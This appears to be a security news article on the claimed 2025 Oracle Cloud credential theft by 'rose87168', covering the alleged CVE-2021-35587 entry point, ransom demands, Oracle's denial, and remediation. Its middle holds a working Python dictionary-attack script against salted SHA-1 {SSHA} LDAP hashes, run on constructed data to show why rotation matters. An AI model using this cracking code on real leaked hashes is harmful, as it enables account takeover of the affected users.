A threat actor operating under the alias "rose87168" has claimed responsibility for a significant data breach, saying they stole roughly six million records from Oracle Cloud servers. If the claim holds, a vulnerability in a shared, public-facing component of Oracle's cloud would have exposed credential material belonging to a very large number of customers at once, which is what makes the incident alarming beyond any single tenant.
The stolen data reportedly includes Java KeyStore (JKS) files, encrypted Single Sign-On (SSO) credentials, hashed LDAP passwords, key files, and Java Platform Security (JPS) keys from Oracle Enterprise Manager. The actor claims the breach affects more than 140,000 tenants worldwide. These items matter because they are reusable secrets rather than ordinary personal data: a keystore or JPS key can allow an attacker to decrypt stored credentials or impersonate a service, and a hashed password can be cracked offline at the attacker's leisure.
According to the actor, the intrusion came through Oracle Cloud's login infrastructure, at endpoints of the form login.(region-name).oraclecloud.com. That subdomain allegedly ran an outdated version of Oracle Fusion Middleware, which would have left it exposed to the known CVE-2021-35587, an unauthenticated remote code execution flaw in Oracle Access Manager. Taken at face value, this is initial access via Exploit Public-Facing Application (T1190) in the MITRE ATT&CK Matrix; none of it has been independently confirmed.
The stolen records are reportedly being offered for sale on dark web forums, including BreachForums. "rose87168" is reportedly demanding ransom from affected organizations, threatening to sell or expose the compromised data if the demands are not met. The actor is also offering incentives to other forum members who help decrypt the encrypted SSO credentials or crack the hashed LDAP passwords, effectively crowdsourcing the cracking effort so that the hashed material becomes usable more quickly.
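To show why "hashed" LDAP passwords are still worth crowdsourcing, and why they must be rotated rather than assumed safe, the following added example (not code from the original article or from Oracle) runs a dictionary attack on a constructed dump in the RFC 2307 {SSHA} format that LDAP directories commonly store. The directory entries, salts, passwords, and wordlist are all constructed for illustration; nothing here is taken from the actual leaked data.

```python
import base64
import hashlib
from typing import Dict, Iterable, Optional


def ssha_hash(password: str, salt: bytes) -> str:
    """Produce an RFC 2307 style {SSHA} value: base64(sha1(password || salt) || salt).

    SHA-1 is fast and unsalted per-guess cost is tiny, which is exactly why an
    offline attacker with the hash can try millions of candidates per second.
    """
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode("ascii")


def crack_ssha(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack against one {SSHA} value.

    The salt is appended in the clear after the 20-byte SHA-1 digest, so the
    attacker recovers it directly from the stored value and hashes each
    candidate with it. Returns the matching password, or None if no candidate hits.
    """
    prefix = "{SSHA}"
    if not stored.startswith(prefix):
        raise ValueError("not an {SSHA} hash")
    raw = base64.b64decode(stored[len(prefix):])
    digest, salt = raw[:20], raw[20:]
    for candidate in wordlist:
        if hashlib.sha1(candidate.encode("utf-8") + salt).digest() == digest:
            return candidate
    return None


def crack_dump(dump: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, Optional[str]]:
    """Attempt every entry in a leaked DN -> {SSHA} mapping with the same wordlist."""
    words = list(wordlist)  # materialise once so it can be reused per entry
    return {dn: crack_ssha(stored, words) for dn, stored in dump.items()}


# Constructed "leaked" directory dump. Fixed salts keep the output deterministic;
# real directories draw them at random. Two users share a weak password, one
# service account has a strong one.
LEAKED_DUMP = {
    "uid=jdoe,ou=people,dc=example,dc=com": ssha_hash("Winter2024!", b"\x01\x02\x03\x04"),
    "uid=asmith,ou=people,dc=example,dc=com": ssha_hash("Winter2024!", b"\x05\x06\x07\x08"),
    "uid=svc-oam,ou=services,dc=example,dc=com": ssha_hash("kQ9#vL2$pX7!mW4z", b"\x09\x0a\x0b\x0c"),
}

# Constructed wordlist; a real attacker would use tens of millions of entries plus rules.
WORDLIST = ["password", "Welcome1", "Oracle123", "Winter2024!", "Summer2024!"]


if __name__ == "__main__":
    for dn, recovered in crack_dump(LEAKED_DUMP, WORDLIST).items():
        print(f"{dn}: {recovered if recovered else '<not in wordlist>'}")
```

Two things to notice. The two users with the same password produce different {SSHA} values because the salt differs, so each hash has to be attacked separately; that per-hash cost is what the actor is trying to spread across forum volunteers. And the salt does nothing to slow a single guess, so any account whose password appears in a common wordlist falls in milliseconds once the hash is in an attacker's hands. Rotation, not the hashing, is what removes the risk.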
In response to the claims, Oracle has firmly denied any breach of its cloud infrastructure. In a statement released on March 21, 2025, the company said customer data remained secure and that the published credentials were not linked to its systems. The claim and the denial cannot both be right, and customers cannot settle the question from outside; that uncertainty is itself a reason to respond as though exposure is possible. Whatever the outcome, the alleged path, an unpatched, internet-facing identity component, is a recurring pattern in attacks on cloud services.
Organizations using Oracle Cloud are advised to act swiftly rather than wait for the dispute to be resolved. Concretely, that means rotating SSO and LDAP passwords and any keystore or JPS keys that could have been exposed, regenerating certificates held in affected JKS files, tightening access controls such as enforcing MFA on federated logins, and reviewing authentication logs for unusual sign-ins. Forensic review of the organization's own Oracle-facing integrations and direct engagement with Oracle for remediation guidance should be immediate priorities.
The "rose87168" handle only appeared in January 2025, and the actor asserts that access was gained roughly 40 days before the data was advertised online. If true, that gap means compromised credentials could have been used quietly for weeks before defenders had any signal, which is the case for continuous monitoring of authentication activity rather than point-in-time checks, alongside robust baseline controls.
This incident serves as a stark reminder of the evolving cybersecurity challenges businesses face. As reliance on cloud services increases, timely patching of internet-facing components, effective threat detection, and proactive defenses must be prioritized, because a single shared component left vulnerable can expose every tenant behind it.